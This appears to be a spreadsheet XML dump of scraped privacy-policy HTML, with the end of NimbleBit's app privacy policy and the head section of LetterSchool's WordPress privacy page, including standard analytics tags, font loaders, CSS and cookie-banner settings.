    <t>start"&gt;&lt;li class="c6 c15"&gt;&lt;span class="c2"&gt;LEGO System A/S: &lt;/span&gt;&lt;span class="c11"&gt;&lt;a class="c7" href="https://www.google.com/url?q=https://www.lego.com/en-us/legal/legal-notice/privacy-policy-full&amp;amp;sa=D&amp;amp;ust=1581010951879000"&gt;https://www.lego.com/en-us/legal/legal-notice/privacy-policy-full&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p class="c5"&gt;&lt;span class="c4 c2"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c0"&gt;Third-party Analytics&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;This application collects general usage data using Third-party Analytics services. This allows us to know things like how many users we have and what types of devices they use.</t>
  </si>
  <si>
    <t>The privacy policies of the Analytics services used are linked below.&lt;/span&gt;&lt;/p&gt;&lt;ul class="c1 lst-kix_g4j7gzxtiqll-0 start"&gt;&lt;li class="c6 c15"&gt;&lt;span class="c2"&gt;Unity Analytics: &lt;/span&gt;&lt;span class="c11"&gt;&lt;a class="c7" href="https://www.google.com/url?q=https://unity3d.com/legal/privacy-policy&amp;amp;sa=D&amp;amp;ust=1581010951879000"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6 c15"&gt;&lt;span class="c2"&gt;Facebook: &lt;/span&gt;&lt;span class="c11"&gt;&lt;a class="c7" href="https://www.google.com/url?q=https://www.facebook.com/about/privacy/&amp;amp;sa=D&amp;amp;ust=1581010951880000"&gt;https://www.facebook.com/about/privacy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6 c15"&gt;&lt;span class="c2"&gt;AppsFlyer: &lt;/span&gt;&lt;span class="c11"&gt;&lt;a class="c7" href="https://www.google.com/url?q=https://www.appsflyer.com/services-privacy-policy/&amp;amp;sa=D&amp;amp;ust=1581010951880000"&gt;https://www.appsflyer.com/services-privacy-policy/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p class="c5"&gt;&lt;span class="c4 c2"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c2</t>
  </si>
  <si>
    <t>c10"&gt;Your Access to and Control Over Information&lt;/span&gt;&lt;span class="c4 c2"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span</t>
  </si>
  <si>
    <t>class="c4 c2"&gt;You can do the following at any time by contacting us via our support email address:&lt;/span&gt;&lt;/p&gt;&lt;ul class="c1 lst-kix_uomkm09zrrcw-0 start"&gt;&lt;li class="c13"&gt;&lt;span class="c4</t>
  </si>
  <si>
    <t>c2"&gt;See what data we have about you, if any.&lt;/span&gt;&lt;/li&gt;&lt;li class="c13"&gt;&lt;span class="c4 c2"&gt;Have us delete any data we have about you.&lt;/span&gt;&lt;/li&gt;&lt;li class="c13"&gt;&lt;span</t>
  </si>
  <si>
    <t>class="c4 c2"&gt;Express any concern you have about our use of your data.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p class="c6"&gt;&lt;span class="c2 c10"&gt;Security&lt;/span&gt;&lt;span class="c2 c4"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;We take precautions to protect your information.</t>
  </si>
  <si>
    <t>When you submit sensitive information via the application, your information is protected both online and offline.&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;All sensitive information is encrypted and transmitted to us in a secure way using standard web security practices.&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c4 c2"&gt;While we use encryption to protect sensitive information transmitted online, we also protect your information offline. Only employees who need the information to perform a specific job (for example, customer service) are granted access to personally identifiable information.</t>
  </si>
  <si>
    <t>The computers/servers in which we store personally identifiable information are kept in a secure environment.&lt;/span&gt;&lt;/p&gt;&lt;p class="c6"&gt;&lt;span class="c0"&gt;If you feel that we are not abiding by this privacy policy, you should contact us immediately via email at support@nimblebit.com.&lt;/span&gt;&lt;/p&gt;&lt;p class="c16"&gt;&lt;span class="c4 c8"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;
		&lt;head&gt;
		&lt;!-- Google Tag Manager
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-ML2PBMD');&lt;/script&gt;
&lt;!-- End Google Tag Manager --&gt;
		&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-54387921-38"&gt;&lt;/script&gt;
		&lt;script&gt;
			  </t>
  </si>
  <si>
    <t>window.dataLayer = window.dataLayer || [];
			  function gtag(){dataLayer.push(arguments);}
			  gtag('js', new Date());
			  gtag('config', 'UA-54387921-38');
		&lt;/script&gt; 
		&lt;meta name="p:domain_verify" content="4cee5a4d2e0caa96be00237f5413e929"/&gt;
		&lt;meta charset="UTF-8"&gt;
		&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"/&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
		&lt;link rel="shortcut icon" href="https://www.letterschool.org/wp-content/uploads/2017/10/favicon-1.png" /&gt;
		&lt;title&gt;Privacy Policy &amp;#8211;</t>
  </si>
  <si>
    <t>LetterSchool&lt;/title&gt;
                        &lt;script&gt;
                            /* You can add more configuration options to webfontloader by previously defining the WebFontConfig with your options */
                            if ( typeof WebFontConfig === "undefined" ) {
                                WebFontConfig = new Object();
                            }
                            WebFontConfig['google'] = {families: ['Comfortaa:400,700', 'Montserrat:100,200,300,400,500,600,700,800,900,100italic,200italic,300italic,400italic,500italic,600italic,700italic,800italic,900italic', 'Oswald:300', 'Nunito:800,700']};
                            (function() {
                                var wf = document.createElement( 'script' );
                                 wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js';
                                wf.type</t>
  </si>
  <si>
    <t>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='sdm-styles-css'  href='https://www.letterschool.org/wp-content/plugins/simple-download-monitor/css/sdm_wp_styles.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='mp-theme-css'  href='https://www.letterschool.org/wp-content/plugins/memberpress/css/ui/theme.css?ver=1.9.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://www.letterschool.org/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-css'  href='https://www.letterschool.org/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=1.9.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://www.letterschool.org/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.9.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='edd-styles-css'  href='https://www.letterschool.org/wp-content/plugins/easy-digital-downloads/templates/edd.min.css?ver=2.9.26' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='bootstrap.min-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/css/bootstrap.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='flexslider-css'  href='https://www.letterschool.org/wp-content/plugins/js_composer/assets/lib/bower/flexslider/flexslider.min.css?ver=5.3' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='owl-carousel-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/vendors/owl-carousel/owl.carousel.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jquery.mCustomScrollbar-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/vendors/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jquery.fancybox-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/vendors/FancyBox/jquery.fancybox.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='colorbox-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/css/colorbox.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css'  href='https://www.letterschool.org/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.3' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='pe-icon-7-stroke-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/vendors/pe-icon-7-stroke/css/pe-icon-7-stroke.css?ver=1.2.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='tb.core.min-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/css/tb.core.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='shortcodes-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/framework/shortcodes/shortcodes.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='main-style-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/css/main-style.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='style-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/style.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp_custom_style-css'  href='https://www.letterschool.org/wp-content/themes/letterschool/assets/css/wp_custom_style.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;style id='wp_custom_style-inline-css' type='text/css'&gt;
		.header-menu {
			background: ;
		}
		.header-menu #nav &gt; li &gt; a, .header-menu .col-search-cart a.icon_search_wrap, .header-menu .col-search-cart a.icon_cart_wrap, .header-menu .col-search-cart .header-menu-item-icon a, .header-menu .col-search-cart  .tb-menu-control-mobi a{
			color: ;
		}
		.header-menu #nav &gt; li:hover{
			background: ;
		}
		.header-menu #nav &gt; li:hover a, .header-menu #nav li.current-menu-ancestor a, .header-menu #nav li.current-menu-parent a, .header-menu #nav li.current-menu-item a, .header-menu a.icon_search_wrap:hover, .header-menu a.icon_cart_wrap:hover, .header-menu .tb-menu-control-mobi a:hover {
			color: ;
		}
		.tb-menu-list .menu-bg-logo{ background-image:url(https://www.letterschool.org/wp-content/uploads/2019/09/logo-new-1.png); }
.textwidget ul li a {_x005F_x000D_
    /</t>
  </si>
  <si>
    <t>* padding: 10px 0; */_x005F_x000D_
    font-weight: 600;_x005F_x000D_
    color: #FFF;_x005F_x000D_
    text-decoration: none;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.menu-item a {_x005F_x000D_
    text-decoration: none;_x005F_x000D_
    color: #717171 ! important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.jws_theme_footer .socials li.fb-color a {_x005F_x000D_
    background-color: #205a9b;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.jws_theme_footer</t>
  </si>
  <si>
    <t>.socials li.tw-color a {_x005F_x000D_
    background-color: #00acf7;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.jws_theme_footer .socials li.insta-color a {_x005F_x000D_
    background-color: #ea216d;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.jws_theme_footer</t>
  </si>
  <si>
    <t>.socials li.google-color a {_x005F_x000D_
    background-color: #e9171b;_x005F_x000D_
}_x005F_x000D_
.review {_x005F_x000D_
    box-shadow: 0 0px 12px rgba(0,0,0,0.275);_x005F_x000D_
    padding: 20px ! important;_x005F_x000D_
    border-radius: 5px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
body {_x005F_x000D_
    -webkit-font-smoothing: antialiased;_x005F_x000D_
}_x005F_x000D_
body.single.single-post a {_x005F_x000D_
    color: #0896f9;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.tp-dottedoverlay.twoxtwo				{	background:rgba(0, 0, 0, 0.35) !</t>
  </si>
  <si>
    <t>important;}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
span.tb-blog-date {_x005F_x000D_
    display: none;_x005F_x000D_
}_x005F_x000D_
.title-bar h1 {_x005F_x000D_
text-transform: none;_x005F_x000D_
}_x005F_x000D_
img.size-large {_x005F_x000D_
    max-width: 100%;_x005F_x000D_
    max-height: 100%;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.title-bar:before {_x005F_x000D_
_x005F_x000D_
    background: rgba(0,0,0,0.2);_x005F_x000D_
    _x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
a, a:hover, a:focus, a:active {_x005F_x000D_
    text-decoration: underline;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
h3.tb-title {_x005F_x000D_
     / * background: #FFF; */_x005F_x000D_
    / * padding: 20px; */_x005F_x000D_
    /</t>
  </si>
  <si>
    <t>* margin: 0px; */_x005F_x000D_
    /* border-radius: 51px; */_x005F_x000D_
    color: #222 ! important;_x005F_x000D_
    /* line-height: 28px; */_x005F_x000D_
    /* box-shadow: rgba(0, 0, 0, 0.75) 0px 0.0555556em 0.138889em; */_x005F_x000D_
}_x005F_x000D_
h1.jws-title-underline.jws-title-underline-1 {_x005F_x000D_
   /</t>
  </si>
  <si>
    <t>* background: #FFF; */_x005F_x000D_
    / * padding: 14px; */_x005F_x000D_
    /* text-align: center; */_x005F_x000D_
    color: #fff ! important;_x005F_x000D_
    font-size: 46px;_x005F_x000D_
    /* border-radius: 53px; */_x005F_x000D_
    /</t>
  </si>
  <si>
    <t>* padding: 25px; */_x005F_x000D_
    /* box-shadow: rgba(0, 0, 0, 0.75) 0px 0.0555556em 0.138889em; */_x005F_x000D_
    max-width: 450px;_x005F_x000D_
    margin: auto;_x005F_x000D_
    _ x000D_
}_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
a.dl-button:hover {_x005F_x000D_
    text-decoration: none;_x005F_x000D_
    color: #FFF;_x005F_x000D_
    font-size: 1.05em;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.dl-button {_x005F_x000D_
    font-weight: 600;_x005F_x000D_
    background-color: #ff900a;_x005F_x000D_
    background-image: linear-gradient(to right,#ff9b0b 0,#ff8408 100%);_x005F_x000D_
    background-repeat: repeat-x;_x005F_x000D_
    color: #fff;_x005F_x000D_
    box-shadow: 0 2px 4px 0 rgba(0,0,0,.5);_x005F_x000D_
    border-radius: 3em;_x005F_x000D_
    padding: 20px;_x005F_x000D_
    line-height: 1.66666667;_x005F_x000D_
    text-decoration: none;_x005F_x000D_
    position: absolute;_x005F_x000D_
    margin-left: 90px;_x005F_x000D_
    margin-top: 300px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.head-text {_x005F_x000D_
    font-weight: 600;_x005F_x000D_
    color: #FFF;_x005F_x000D_
    line-height: 51px;_x005F_x000D_
    text-shadow: 0</t>
  </si>
  <si>
    <t xml:space="preserve">0.05555556em 0.13888889em rgba(0,0,0,.9);_x005F_x000D_
    font-size: 42px;_x005F_x000D_
    margin-left: 90px;_x005F_x000D_
    position: absolute;_x005F_x000D_
    margin-top: 213px;_x005F_x000D_
        letter-spacing: -1px;_x005F_x000D_
}_x005F_x000D_
</t>
  </si>
  <si>
    <t>.vc_custom_1560278743119 {_x005F_x000D_
    background-image: url(https://www.letterschool.org/wp-content/uploads/2019/05/LetterSchool-Learn-to-read-and-write-1.jpg?id=5487) ! important;_x005F_x000D_
    background-position: center ! important;_x005F_x000D_
    background-repeat: no-repeat !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
    background-size: cover ! important;_x005F_x000D_
    min-height: 600px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
@media only screen and (max-width: 399.98px) {_x005F_x000D_
    _x005F_x000D_
    .head-text {_x005F_x000D_
    font-weight: 600;_x005F_x000D_
    color: #FFF;_x005F_x000D_
    line-height: 37px;_x005F_x000D_
    text-shadow: 0 0.05555556em 0.13888889em</t>
  </si>
  <si>
    <t>rgba(0,0,0,.9);_x005F_x000D_
    font-size: 27px;_x005F_x000D_
    margin-left: 30px;_x005F_x000D_
    position: absolute;_x005F_x000D_
    margin-top: 0px;_x005F_x000D_
    letter-spacing: -1px;_x005F_x000D_
    text-align: center;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.dl-button {_x005F_x000D_
    font-weight: 600;_x005F_x000D_
    background-color: #ff900a;_x005F_x000D_
    background-image: linear-gradient(to right,#ff9b0b 0,#ff8408 100%);_x005F_x000D_
    background-repeat: repeat-x;_x005F_x000D_
    color: #fff;_x005F_x000D_
    box-shadow: 0 2px 4px 0 rgba(0,0,0,.5);_x005F_x000D_
    border-radius: 3em;_x005F_x000D_
    padding: 20px;_x005F_x000D_
    line-height: 1.66666667;_x005F_x000D_
    text-decoration: none;_x005F_x000D_
    position: absolute;_x005F_x000D_
    margin-left: 122px;_x005F_x000D_
    margin-top: 314px;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.green-button {_x005F_x000D_
    font-weight: 700;_x005F_x000D_
    background-color: #ff900a;_x005F_x000D_
    background-image:</t>
  </si>
  <si>
    <t>linear-gradient(142deg,#6fef0d 0,#2a8200 100%);_x005F_x000D_
    background-repeat: repeat-x;_x005F_x000D_
    color: #fff;_x005F_x000D_
    box-shadow: 0 2px 4px 0 rgba(0,0,0,.5);_x005F_x000D_
    border-radius: 3em;_x005F_x000D_
    padding: 18px;_x005F_x000D_
    line-height: 1.666667;_x005F_x000D_
    text-decoration:</t>
  </si>
  <si>
    <t>none;_x005F_x000D_
    padding-left: 75px;_x005F_x000D_
    padding-right: 75px;_x005F_x000D_
    font-family: comfortaa;_x005F_x000D_
	max-width: 350px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.title-bar .page-title, body h2 {_x005F_x000D_
    _ x000D_
    text-align: center;_x005F_x000D_
    line-height: 31px;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    font-style: normal;_x005F_x000D_
    color: #fff;_x005F_x000D_
    font-size: 31px;_x005F_x000D_
    opacity: 1;_x005F_x000D_
    visibility: visible;_x005F_x000D_
    -webkit-transition: opacity 0.24s ease-in-out;_x005F_x000D_
    -moz-transition: opacity 0.24s ease-in-out;_x005F_x000D_
    transition: opacity 0.24s ease-in-out;_x005F_x000D_
    background: #51a3da;_x005F_x000D_
    border-radius: 67px;_x005F_x000D_
    max-width: 531px;_x005F_x000D_
    margin: auto;_x005F_x000D_
    font-weight: 700;_x005F_x000D_
    box-shadow: rgba(0, 0, 0, 0.75) 0px</t>
  </si>
  <si>
    <t>0.0555556em 0.138889em;_x005F_x000D_
    padding: 14px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
img.alignnone {_x005F_x000D_
    margin: 0px 0 ! important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
.header-btn a {_x005F_x000D_
color: #FFF ! important;_x005F_x000D_
    line-height: 19px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.btn</t>
  </si>
  <si>
    <t>a {_x005F_x000D_
    line-height: 19px !important;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
#magic-line {_x005F_x000D_
    display: none ! important;_x005F_x000D_
}_x005F_x000D_
.header-btn_x005F_x000D_
{ _x005F_x000D_
_ x000D_
display: inline-block !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
_x005F_x000D_
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='js_composer_front-css'  href='https://www.letterschool.org/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.3' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://www.letterschool.org/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='cookie-law-info-js-extra'&gt;
/* &lt;! [CDATA[ */
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","ccpaType":"gdpr","js_blocking":"","custom_integration":"","triggerDomRefresh":""};
var cli_cookiebar_settings = {"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#51a3da","button_1_button_hover":"#4182ae","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":"","button_2_hidebar":"","button_3_button_colour":"#51a3da","button_3_button_hover":"#4182ae","button_3_link_colour":"#fff","button_3_as_button":"1","button_3_new_win":"","button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#62a329","button_4_as_button":"","font_family":"inherit","header_fix":"","notify_animate_hide":"","notify_animate_show":"","notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":"","scroll_close_reload":"","accept_close_reload":"","reject_close_reload":"","showagain_tab":"1","showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#000000","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/www.letterschool.org\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.letterschool.org/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.9.4' id='cookie-law-info-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='sdm-scripts-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var sdm_ajax_script = {"ajaxurl":"https:\/\/www.letterschool.org\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.letterschool.org/wp-content/plugins/simple-download-monitor/js/sdm_wp_scripts.js?ver=5.5.11' id='sdm-scripts-js'&gt;&lt;/script&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.letterschool.org/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.letterschool.org/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.5.11" /&gt;
&lt;link rel="canonical" href="https://www.letterschool.org/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://www.letterschool.org/?p=4520' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.letterschool.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.letterschool.org%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.letterschool.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.letterschool.org%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="Easy Digital Downloads v2.9.26" /&gt;
&lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress. "/&gt;
&lt;!--[if lte IE 9]&gt;&lt;link rel="stylesheet" type="text/css" href="https://www.letterschool.org/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"&gt;&lt;![endif]--&gt;&lt;style type="text/css" title="dynamic-css" class="options-output"&gt;body{background-color:#ffffff;}#nav &gt; li &gt; a, a.icon_search_wrap, a.icon_cart_wrap, .header-menu-item-icon a{font-family:Comfortaa;font-style:normal;font-size:14px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading #nav &gt; li &gt; a,.wf-loading  a.icon_search_wrap,.wf-loading  a.icon_cart_wrap,.wf-loading  .header-menu-item-icon a{opacity: 0;}.ie.wf-loading #nav &gt; li &gt;</t>
  </si>
  <si>
    <t>a,.ie.wf-loading  a.icon_search_wrap,.ie.wf-loading  a.icon_cart_wrap,.ie.wf-loading  .header-menu-item-icon a{visibility: hidden;}#nav &gt; li &gt; ul li a,{font-family:Comfortaa;line-height:40px;font-style:normal;font-size:14px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading #nav &gt; li &gt; ul li a,.wf-loading {opacity: 0;}.ie.wf-loading #nav &gt; li &gt;</t>
  </si>
  <si>
    <t>ul li a,.ie.wf-loading {visibility: hidden;}#nav &gt; li &gt; a{padding-top:0;padding-right:13px;padding-bottom:0;padding-left:13px;}.tb-error404-wrap{background-size:cover;background-image:url('https://www.letterschool.org/wp-content/uploads/2016/06/404.jpg');}.jws_theme_footer{background-color:#333333;background-repeat:no-repeat;background-size:cover;background-position:center top;}.jws_theme_footer{margin-top:0;margin-right:0;margin-bottom:0;margin-left:0;}.jws_theme_footer{padding-top:0;padding-right:0;padding-bottom:0;padding-left:0;}.jws_theme_footer .footer-top{background-color:transparent;}.jws_theme_footer .footer-top{margin-top:0;margin-right:0;margin-bottom:0;margin-left:0;}.jws_theme_footer .footer-top{padding-top:60px;padding-right:0;padding-bottom:20px;padding-left:0;}.jws_theme_footer .footer-center{background-color:transparent;}.jws_theme_footer .footer-center{margin-top:0;margin-right:0;margin-bottom:0;margin-left:0;}.jws_theme_footer .footer-center{padding-top:0;padding-right:0;padding-bottom:50px;padding-left:0;}.jws_theme_footer .footer-bottom{background-color:#333333;}.jws_theme_footer .footer-bottom{margin-top:0;margin-right:0;margin-bottom:0;margin-left:0;}.jws_theme_footer .footer-bottom{padding-top:20px;padding-right:0;padding-bottom:20px;padding-left:0;}body{font-family:Comfortaa;line-height:26px;font-weight:400;font-style:normal;color:#222222;font-size:16px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body{opacity: 0;}.ie.wf-loading body{visibility: hidden;}body h1{font-family:Comfortaa;line-height:40px;font-weight:700;font-style:normal;color:#222222;font-size:46px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h1{opacity: 0;}.ie.wf-loading body h1{visibility: hidden;}body h2{font-family:Comfortaa;line-height:31px;font-weight:700;font-style:normal;color:#ffffff;font-size:31px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h2{opacity: 0;}.ie.wf-loading body h2{visibility: hidden;}body h3{font-family:Comfortaa;line-height:29px;font-weight:normal;font-style:normal;color:#222222;font-size:26px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h3{opacity: 0;}.ie.wf-loading body h3{visibility: hidden;}body h4{font-family:Comfortaa;line-height:22px;font-weight:normal;font-style:normal;color:#222222;font-size:18px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h4{opacity: 0;}.ie.wf-loading body h4{visibility: hidden;}body h5{font-family:Comfortaa;line-height:22px;font-weight:700;font-style:normal;color:#222222;font-size:16px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h5{opacity: 0;}.ie.wf-loading body h5{visibility: hidden;}body h6{font-family:Comfortaa;line-height:17px;font-weight:normal;font-style:normal;color:#272727;font-size:14px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading body h6{opacity: 0;}.ie.wf-loading body h6{visibility: hidden;}.font-preschool-1{font-family:Montserrat;font-weight:300;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading .font-preschool-1{opacity: 0;}.ie.wf-loading .font-preschool-1{visibility: hidden;}.font-preschool-2{font-family:Oswald;font-weight:300;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading .font-preschool-2{opacity: 0;}.ie.wf-loading .font-preschool-2{visibility: hidden;}.font-preschool-3{font-family:Nunito;font-weight:800;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 